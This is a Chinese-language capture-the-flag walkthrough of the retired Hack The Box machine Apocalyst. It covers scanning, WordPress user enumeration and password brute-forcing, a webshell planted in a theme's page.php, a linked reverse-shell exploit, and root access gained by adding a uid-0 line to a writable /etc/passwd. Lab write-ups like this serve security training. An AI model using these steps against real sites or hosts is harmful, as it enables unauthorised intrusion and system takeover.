本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切後果與發表本文章的作者無關

靶機是作者購買VIP使用退役靶機操作，顯示IP地址為10.10.10.46

本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描

執行命令

autorecon 10.10.10.46 -o ./apocalyst-autorecon

最終的掃描結果

發現開放了兩個埠，訪問web應用看看

然後根據上面掃描的結果中爆破的目錄有很多，目標是個WordPress程式，訪問到了其後臺管理地址，這裡剛開始是使用IP地址訪問，發現目標地址會自動訪問域名，所以就添加了本地hosts

echo "10.10.10.46 apocalyst.htb" | sudo tee -a /etc/hosts.

訪問正常之後，先使用wpscan把目標存在的使用者跑出來

wpscan --url http://apocalyst.htb/ -e

有了使用者根據目標頁面生成字典再跑一下

cewl -d 0 http://apocalyst.htb -w brutelist.txt

使用上面的字典跑一下WordPress的使用者密碼

wpscan --url http://apocalyst.htb --usernames falaraki --passwords ./brutelist.txt

遺憾的是沒有跑出來密碼，那麼再回到開始再次跑目錄，不過這次是使用上面得到的字典去跑

gobuster dir -u http://apocalyst.htb/ -w /home/kali/Downloads/htb/apocalyst/brutelist.txt -x php -o bmfx-apocalyst.gobusters -t 100

根據上面跑出來的目錄，經過大量訪問測試，最終鎖定目錄/Rightiousness下訪問得到的圖片中使用了隱寫術存放了密碼字典

既然有類似字典的，那麼再跑下WordPress的使用者密碼

wpscan --url http://apocalyst.htb --usernames falaraki --passwords ./list.txt

跑出了密碼

| Username: falaraki, Password: Transclisiation

登入了到目標WordPress後臺，發現跟之前的靶機blocky利用方式一樣，具體如下

登入到目標WordPress程式找到路徑/wp-content/themes/twentyseventeen/page.php 當然還有其他寫webshell程式碼的位置，只要有許可權寫入即可，這裡只是列舉其中之一，寫入如下php程式碼

if (isset($_GET[0])) {
system($_GET[0]);
}

訪問http://apocalyst.htb/wp-content/themes/twentyseventeen/page.php?0=id 即可遠端執行命令

根據上面的操作原理，製作的如下一鍵反彈shell程式碼
https://github.com/nullarmor/hackthebox-exploits/blob/master/blocky/exploit.py (使用Python3執行)

也可以自己反彈shell

使用LinEnum.sh收集了提權相關的資訊，發現/etc/passwd是含有寫入的許可權，直接新增一個uid為0的使用者即可提權

bmfx:vElWaD/nKmUyw:0:0:root:/root:/bin/bash